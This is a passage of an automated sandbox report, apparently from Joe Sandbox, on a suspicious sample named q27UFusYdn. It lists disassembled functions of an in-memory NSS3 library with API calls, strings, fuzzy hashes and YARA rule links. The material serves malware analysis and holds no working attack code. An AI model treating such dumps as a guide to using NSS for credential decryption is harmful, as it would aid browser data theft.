Part of subcall function 6CE16AF0: SECITEM_ArenaDupItem_Util.NSS3(00000000,6CE1B21D,00000000,00000000,6CE1B219,?,6CE16BFB,00000000,?,00000000,00000000,?,?,?,6CE1B21D), ref: 6CE16B01
Part of subcall function 6CE16AF0: SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,00000000), ref: 6CE16B8A

SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6CE16F1E
PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6CE16F35
SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CF38FE0,00000000), ref: 6CE16F6B
PR_SetError.NSS3(FFFFE005,00000000,6CE17D8F,?,?), ref: 6CE16FE1

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: Util$Arena$Item_$Alloc_$DecodeQuick$AllocateErrorValue$CriticalEnterSectionUnlockfreememcpy
String ID:
API String ID: 587344769-0
Opcode ID: 95c3222cdcc835b07788214549dd31e5951fa47a2189ef0e9e6e87e9c629c4b6
Instruction ID: ffe7f17581437cfc2c90abd39f60c9fc94923d4ff12866ca8484bb5e47b9f27f
Opcode Fuzzy Hash: 95c3222cdcc835b07788214549dd31e5951fa47a2189ef0e9e6e87e9c629c4b6
Instruction Fuzzy Hash: CE719E71D142469BDB00CF15CD41BAABBB8FF9834CF254269E808D7B11E730EAA4CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6CE5ADC0 Relevance: 15.1, APIs: 10, Instructions: 148COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,6CE3CDBB,?,6CE3D079,00000000,00000001), ref: 6CE5AE10
EnterCriticalSection.KERNEL32(?,?,6CE3CDBB,?,6CE3D079,00000000,00000001), ref: 6CE5AE24
PR_Unlock.NSS3(?,?,?,?,?,?,6CE3D079,00000000,00000001), ref: 6CE5AE5A
memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6CE3CDBB,?,6CE3D079,00000000,00000001), ref: 6CE5AE6F
free.MOZGLUE(85145F8B,?,?,?,?,6CE3CDBB,?,6CE3D079,00000000,00000001), ref: 6CE5AE7F
TlsGetValue.KERNEL32(?,6CE3CDBB,?,6CE3D079,00000000,00000001), ref: 6CE5AEB1
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6CE3CDBB,?,6CE3D079,00000000,00000001), ref: 6CE5AEC9
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6CE3CDBB,?,6CE3D079,00000000,00000001), ref: 6CE5AEF1
free.MOZGLUE(6CE3CDBB,?,?,?,?,?,?,?,?,?,?,?,?,?,6CE3CDBB,?), ref: 6CE5AF0B
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6CE3CDBB,?,6CE3D079,00000000,00000001), ref: 6CE5AF30

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: Unlock$CriticalEnterSectionValuefree$memset
String ID:
API String ID: 161582014-0
Opcode ID: a9e10c0aecf29af08896085d89127b4bf616749128ae2ba723eec50d879cd5b2
Instruction ID: 27d154e41c2851de61921663ce3bcdc7e92bdc85c2a0afe2ca9a59148d058b8c
Opcode Fuzzy Hash: a9e10c0aecf29af08896085d89127b4bf616749128ae2ba723eec50d879cd5b2
Instruction Fuzzy Hash: 1651C0B1A40602AFDB01DF25D885B65B7B4FF09318F644669E81897F11E732E8B4CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6CE34CA0 Relevance: 15.1, APIs: 10, Instructions: 142COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,00000000,00000000,?,6CE3AB7F,?,00000000,?), ref: 6CE34CB4
EnterCriticalSection.KERNEL32(0000001C,?,6CE3AB7F,?,00000000,?), ref: 6CE34CC8
TlsGetValue.KERNEL32(?,6CE3AB7F,?,00000000,?), ref: 6CE34CE0
EnterCriticalSection.KERNEL32(?,?,6CE3AB7F,?,00000000,?), ref: 6CE34CF4
PL_HashTableLookup.NSS3(?,?,?,6CE3AB7F,?,00000000,?), ref: 6CE34D03
PR_Unlock.NSS3(?,00000000,?), ref: 6CE34D10

Part of subcall function 6CEBDD70: TlsGetValue.KERNEL32 ref: 6CEBDD8C
Part of subcall function 6CEBDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CEBDDB4

PR_Now.NSS3(?,00000000,?), ref: 6CE34D26

Part of subcall function 6CED9DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6CF20A27), ref: 6CED9DC6
Part of subcall function 6CED9DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6CF20A27), ref: 6CED9DD1
Part of subcall function 6CED9DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CED9DED

PR_Unlock.NSS3(?,?,00000000,?), ref: 6CE34D98
PR_Unlock.NSS3(?,?,?,00000000,?), ref: 6CE34DDA
PR_Unlock.NSS3(?,?,?,?,00000000,?), ref: 6CE34E02

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: Unlock$CriticalSectionTimeValue$EnterSystem$FileHashLeaveLookupTableUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 4032354334-0
Opcode ID: 8038ff2a431ee924fc328797b60bc0de4472cb4fef950fde7a84414cda246c94
Instruction ID: 2fca687b67816897155ddf1b495df0db43db04320dc2831b8a3e5fa7c3dcfc77
Opcode Fuzzy Hash: 8038ff2a431ee924fc328797b60bc0de4472cb4fef950fde7a84414cda246c94
Instruction Fuzzy Hash: 5341C9B6E002119BEB016F25EC40A667BB8FF0621CF655175EC1C87B12EB36E924C7E1

Uniqueness

Uniqueness Score: -1.00%

Function 6CE12E00 Relevance: 15.1, APIs: 10, Instructions: 78COMMON

Download Yara Rule

APIs

SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6CE12CDA,?,00000000), ref: 6CE12E1E

Part of subcall function 6CE6FD80: PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6CE19003,?), ref: 6CE6FD91
Part of subcall function 6CE6FD80: PORT_Alloc_Util.NSS3(A4686CE7,?), ref: 6CE6FDA2
Part of subcall function 6CE6FD80: memcpy.VCRUNTIME140(00000000,12D068C3,A4686CE7,?,?), ref: 6CE6FDC4

SECITEM_DupItem_Util.NSS3(?), ref: 6CE12E33

Part of subcall function 6CE6FD80: free.MOZGLUE(00000000,?,?), ref: 6CE6FDD1

TlsGetValue.KERNEL32 ref: 6CE12E4E
EnterCriticalSection.KERNEL32(?), ref: 6CE12E5E
PL_HashTableLookup.NSS3(?), ref: 6CE12E71
PL_HashTableRemove.NSS3(?), ref: 6CE12E84
PL_HashTableAdd.NSS3(?,00000000), ref: 6CE12E96
PR_Unlock.NSS3 ref: 6CE12EA9
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CE12EB6
PR_SetError.NSS3(FFFFE013,00000000), ref: 6CE12EC5

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: Util$HashItem_Table$Alloc_$CriticalEnterErrorLookupRemoveSectionUnlockValueZfreefreememcpy
String ID:
API String ID: 3332421221-0
Opcode ID: f61c05c439107293bf12dc2cf8ffe66f4fe574183fc94f76006c30b5040b2edb
Instruction ID: 32cb865a71b43f000d96761c264e1b1d83e92449f590f7f6219ba62d9e440ec9
Opcode Fuzzy Hash: f61c05c439107293bf12dc2cf8ffe66f4fe574183fc94f76006c30b5040b2edb
Instruction Fuzzy Hash: AC21F276E54100A7EF022B25EC09BAA3A78AB5335DF240035ED1892B11F733D678C6F1

Uniqueness

Uniqueness Score: -1.00%

Function 6CD9CEC0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 199COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A7E,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6CD9B999), ref: 6CD9CFF3
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000109DA,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6CD9B999), ref: 6CD9D02B
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A70,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,00000000,?,?,6CD9B999), ref: 6CD9D041
_byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,6CD9B999), ref: 6CEE972B

Strings

%s at line %d of [%.10s], xrefs: 6CD9CFEC, 6CD9D018, 6CD9D029, 6CD9D03F, 6CEE978B
database corruption, xrefs: 6CD9CFE7, 6CD9D013, 6CD9D028, 6CD9D039, 6CD9D03E, 6CEE9786
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CD9CFDD, 6CD9D00E, 6CD9D022, 6CD9D033, 6CEE9780

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: sqlite3_log$_byteswap_ushort
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 491875419-598938438
Opcode ID: 197464cb088cca42ec3446ce97e02499eaaf910340a457b0b19158f250cb0879
Instruction ID: 32c2f06be30f68eba46df63366f59ebfe38578b4d0c8a46bb1ef64d56158355d
Opcode Fuzzy Hash: 197464cb088cca42ec3446ce97e02499eaaf910340a457b0b19158f250cb0879
Instruction Fuzzy Hash: D3614871A043109BD310CF2AC840BA6BBF6EF95318F28856DE4499BB52D376D947C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 6CE74DF0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 184memoryCOMMON

Download Yara Rule

APIs

isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,00000022,?,?,6CE7536F,00000022,?,?,00000000,?), ref: 6CE74E70
PORT_ZAlloc_Util.NSS3(00000000), ref: 6CE74F28
PR_smprintf.NSS3(%s=%s,?,00000000), ref: 6CE74F8E
PR_smprintf.NSS3(%s=%c%s%c,?,?,00000000,?), ref: 6CE74FAE
free.MOZGLUE(?), ref: 6CE74FC8

Strings

oSl", xrefs: 6CE74DFB, 6CE74EF4, 6CE74EC5
%s=%c%s%c, xrefs: 6CE74FA9
%s=%s, xrefs: 6CE74F89

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: R_smprintf$Alloc_Utilfreeisspace
String ID: %s=%c%s%c$%s=%s$oSl"
API String ID: 2709355791-450401312
Opcode ID: 4aa495bcbfb9d3a817db21b1cf1febd75564e733555b039b65d3589f01277304
Instruction ID: 5e4843283bffe7aa0e1ef01608ae4125f0db461f39671e0d3ec3b462d445c75c
Opcode Fuzzy Hash: 4aa495bcbfb9d3a817db21b1cf1febd75564e733555b039b65d3589f01277304
Instruction Fuzzy Hash: 80510521A051498BEB25CA6A84917FE7BF5DB4331CF398127E894ABB41D3359806CFB1

Uniqueness

Uniqueness Score: -1.00%

Function 6CE5AC10 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 121memoryCOMMON

Download Yara Rule

APIs

PK11_CreateContextBySymKey.NSS3(00000133,00000105,00000000,?,?,6CE5AB3E,?,?,?), ref: 6CE5AC35

Part of subcall function 6CE3CEC0: PK11_FreeSymKey.NSS3(00000000), ref: 6CE3CF16

PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6CE5AB3E,?,?,?), ref: 6CE5AC55

Part of subcall function 6CE710C0: TlsGetValue.KERNEL32(?,6CE18802,00000000,00000008,?,6CE0EF74,00000000), ref: 6CE710F3
Part of subcall function 6CE710C0: EnterCriticalSection.KERNEL32(?,?,6CE18802,00000000,00000008,?,6CE0EF74,00000000), ref: 6CE7110C
Part of subcall function 6CE710C0: PL_ArenaAllocate.NSS3(?,?,?,6CE18802,00000000,00000008,?,6CE0EF74,00000000), ref: 6CE71141
Part of subcall function 6CE710C0: PR_Unlock.NSS3(?,?,?,6CE18802,00000000,00000008,?,6CE0EF74,00000000), ref: 6CE71182
Part of subcall function 6CE710C0: TlsGetValue.KERNEL32(?,6CE18802,00000000,00000008,?,6CE0EF74,00000000), ref: 6CE7119C

PK11_CipherOp.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,6CE5AB3E,?,?), ref: 6CE5AC70

Part of subcall function 6CE3E300: TlsGetValue.KERNEL32 ref: 6CE3E33C
Part of subcall function 6CE3E300: EnterCriticalSection.KERNEL32(?), ref: 6CE3E350
Part of subcall function 6CE3E300: PR_Unlock.NSS3(?), ref: 6CE3E5BC
Part of subcall function 6CE3E300: PK11_GenerateRandom.NSS3(00000000,00000008), ref: 6CE3E5CA
Part of subcall function 6CE3E300: TlsGetValue.KERNEL32 ref: 6CE3E5F2
Part of subcall function 6CE3E300: EnterCriticalSection.KERNEL32(?), ref: 6CE3E606
Part of subcall function 6CE3E300: PORT_Alloc_Util.NSS3(?), ref: 6CE3E613

PK11_GetBlockSize.NSS3(00000133,00000000), ref: 6CE5AC92
PK11_DestroyContext.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,6CE5AB3E), ref: 6CE5ACD7
PORT_Alloc_Util.NSS3(?), ref: 6CE5AD10
memcpy.VCRUNTIME140(00000000,?,FF850674), ref: 6CE5AD2B

Part of subcall function 6CE3F360: TlsGetValue.KERNEL32(00000000,?,6CE5A904,?), ref: 6CE3F38B
Part of subcall function 6CE3F360: EnterCriticalSection.KERNEL32(?,?,?,6CE5A904,?), ref: 6CE3F3A0
Part of subcall function 6CE3F360: PR_Unlock.NSS3(?,?,?,?,6CE5A904,?), ref: 6CE3F3D3

Strings

5s/, xrefs: 6CE5AC1E

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: K11_$Value$CriticalEnterSection$Alloc_UnlockUtil$ArenaContext$AllocateBlockCipherCreateDestroyFreeGenerateRandomSizememcpy
String ID: 5s/
API String ID: 2926855110-340167759
Opcode ID: f877449ca027af1041bfed93a32b31c2beae1dd8fadc8a2b36ba909ec7273ae1
Instruction ID: e3fd807e96f37bf233e178de492aa53da6047ad0f44bb70a216d3a535cb95549
Opcode Fuzzy Hash: f877449ca027af1041bfed93a32b31c2beae1dd8fadc8a2b36ba909ec7273ae1
Instruction Fuzzy Hash: 243138B1E002155FEB008E659C409BF7676AF8431CB68812CE819AB740EB32ED25C7B1

Uniqueness

Uniqueness Score: -1.00%

Function 6CEB2E50 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 251COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,00000000), ref: 6CEB3046

Part of subcall function 6CE9EE50: PR_SetError.NSS3(FFFFE013,00000000), ref: 6CE9EE85

PK11_AEADOp.NSS3(?,00000004,?,?,?,?,?,00000000,?,B8830845,?,?,00000000,6CE87FFB), ref: 6CEB312A
memcpy.VCRUNTIME140(00000000,?,?), ref: 6CEB3154
PR_SetError.NSS3(FFFFE001,00000000), ref: 6CEB2E8B

Part of subcall function 6CEBC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CEBC2BF

Part of subcall function 6CE9F110: PR_SetError.NSS3(FFFFE013,00000000,00000000,0000A48E,00000000,?,6CE89BFF,?,00000000,00000000), ref: 6CE9F134

memcpy.VCRUNTIME140(8B3C75C0,?,6CE87FFA), ref: 6CEB2EA4
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CEB317B

Strings

5s/, xrefs: 6CEB2E65

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: Error$memcpy$K11_Value
String ID: 5s/
API String ID: 2334702667-340167759
Opcode ID: 65a9b29a92eda34dfa3d15285c1cf3995d2751739bed606dc8cd25362481e71d
Instruction ID: 2315f1fb6a18d4db0fc4859f4acd8dfaade0b7edb4ab5462af92bcb1da42dbc1
Opcode Fuzzy Hash: 65a9b29a92eda34dfa3d15285c1cf3995d2751739bed606dc8cd25362481e71d
Instruction Fuzzy Hash: B1A1BD71A002199FDB24CF54CC81BEAB7B5EF49308F248199ED496B781E731AD85CF91

Uniqueness

Uniqueness Score: -1.00%

Function 6CE7ED00 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 228memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(?,00000000), ref: 6CE7ED6B
PORT_Alloc_Util.NSS3(00000000), ref: 6CE7EDCE

Part of subcall function 6CE70BE0: malloc.MOZGLUE(6CE68D2D,?,00000000,?), ref: 6CE70BF8
Part of subcall function 6CE70BE0: TlsGetValue.KERNEL32(6CE68D2D,?,00000000,?), ref: 6CE70C15

free.MOZGLUE(00000000,?,?,?,?,6CE7B04F), ref: 6CE7EE46
PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6CE7EECA
PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6CE7EEEA
PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6CE7EEFB

Strings

5s/, xrefs: 6CE7ED17

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: Alloc_Util$Arena$Valuefreemalloc
String ID: 5s/
API String ID: 3768380896-340167759
Opcode ID: 1a26476280591e283de671c7fec5d9e891c5cd95251e5d1a6ccdde3e384f0e3c
Instruction ID: 92db3d9fc47976143d31af9e12379b060aad53750ac0f51a28c25d172f2acae0
Opcode Fuzzy Hash: 1a26476280591e283de671c7fec5d9e891c5cd95251e5d1a6ccdde3e384f0e3c
Instruction Fuzzy Hash: AA8169B1A006059FEB24CF59D885BAA7BB5FF89308F24442CE9159BB51DB30E815CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 6CDAE890 Relevance: 12.4, APIs: 5, Strings: 3, Instructions: 442stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000001), ref: 6CDAE922
memset.VCRUNTIME140(00000000,00000000,?), ref: 6CDAE9CF
memcpy.VCRUNTIME140(00000024,?,?), ref: 6CDAEA0F
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CDAEB20
memcpy.VCRUNTIME140(?,?,?), ref: 6CDAEB57

Strings

foreign key on %s should reference only one column of table %T, xrefs: 6CDAEE04
unknown column "%s" in foreign key definition, xrefs: 6CDAED18
number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 6CDAEDC2

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: memcpystrlen$memset
String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
API String ID: 638109778-272990098
Opcode ID: 1eed77bd660622102975f46a874c9d294c2114dae6cf455046aadfad2ebc57ac
Instruction ID: c01bc190fcc694410143cff09e2647d38bfc8d996c4f80aff0b0d8ddf132c559
Opcode Fuzzy Hash: 1eed77bd660622102975f46a874c9d294c2114dae6cf455046aadfad2ebc57ac
Instruction Fuzzy Hash: F6028071E01215DFDB04CF99C480AEEB7B2BF89318F294169D855ABB61D731A852CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 6CE02D20 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 183COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 6CE02D69

Strings

winTruncate2, xrefs: 6CE02EF8
5s/, xrefs: 6CE02D2C
winUnmapfile1, xrefs: 6CE02F55
winSeekFile, xrefs: 6CE02E9C
winTruncate1, xrefs: 6CE02EBE
winUnmapfile2, xrefs: 6CE02F7F

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: __allrem
String ID: winSeekFile$winTruncate1$winTruncate2$winUnmapfile1$winUnmapfile2$5s/
API String ID: 2933888876-3816827289
Opcode ID: 4b411f25a6da511a785693b8e825a90fba0a00ae85e5ff3ab415abf525c01a8d
Instruction ID: f939ce60c1b99e7c90924db8b04c6bb2952679079b9f08f3f8ba75c95f3db406
Opcode Fuzzy Hash: 4b411f25a6da511a785693b8e825a90fba0a00ae85e5ff3ab415abf525c01a8d
Instruction Fuzzy Hash: 41619F71B402059FDB44CF64DC88B6A7BF1FB59354F20822CE919AB790DB31AC16CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6CE7CCF0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 171memorythreadCOMMON

Download Yara Rule

APIs

Part of subcall function 6CE7C6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6CE7DAE2,?), ref: 6CE7C6C2

PR_Now.NSS3 ref: 6CE7CD35

